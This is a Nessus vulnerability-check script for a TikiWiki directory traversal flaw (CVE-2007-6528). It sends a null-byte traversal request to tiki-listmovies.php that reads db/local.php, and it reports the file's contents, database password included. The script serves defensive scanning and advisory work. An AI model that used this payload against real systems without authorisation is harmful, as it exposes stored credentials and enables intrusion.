#
#  (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29799);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-6528");
  script_bugtraq_id(27008);

  script_name(english:"Tikiwiki movie Parameter Directory Traversal Vulnerability");
  script_summary(english:"Tries to read a local file using tiki-listmovies.php"); 
 
 desc = "
Synopsis :

The remote web server contains a PHP script that is prone to a
directory traversal attack. 

Description :

The remote host is running TikiWiki, an open-source wiki application
written in PHP. 

The version of TikiWiki installed on the remote host fails to sanitize
input to the 'movie' parameter of the 'tiki-listmovies.php' script
before using it to access files.  An unauthenticated attacker may be
able to leverage this issue to read up to 1000 lines of arbitrary
files on the remote host, subject to the privileges of the web server
user id. 

Note that successful exploitation is possible regardless of PHP's
'magic_quotes_gpc' and 'register_globals' settings. 

See also :

http://www.securityfocus.com/archive/1/485482/30/0/threaded
http://tikiwiki.org/ReleaseProcess199

Soltuion :

Upgrade to Tikiwiki 1.9.9 or later. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/tiki", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  file = "../db/local.php";
  req = http_get(
    item:string(
      dir, "/tiki-listmovies.php?",
      "movie=", file, "%001234"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if there's an entry for root.
  if ('$pass_tiki' >< res)
  {
    contents = strstr(res, '<object classid=');
    if ('width="' >< contents) 
      contents = strstr(contents, 'width="') - 'width="';
    if ('"  height="' >< contents) 
      contents = contents - strstr(contents, '"  height="');
    if ('$pass_tiki' >!< contents) contents = res;

    if (report_verbosity > 0)
    {
      info = string(
        "Here are the contents of Tikiwiki's 'db/local.php' file that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        contents
      );
      security_warning(port:port, extra:info);
    }
    else security_warning(port);
    exit(0);
  }
}
